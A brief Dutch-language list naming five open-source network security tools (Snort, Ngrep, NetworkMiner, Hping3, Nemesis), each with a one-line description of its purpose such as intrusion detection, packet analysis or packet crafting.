• Snort Open Source: Systeem voor inbraakdetectie en -preventie.
• Ngrep Open Source: Netwerkpakketanalyse die grep-achtige patronen gebruikt.
• NetworkMiner Open Source: Tool voor netwerk forensische analyse.
• Hping3 Open Source: Command-line pakket creëren en analysetool.
• Nemesis Open Source: Pakket creëren en injectietool.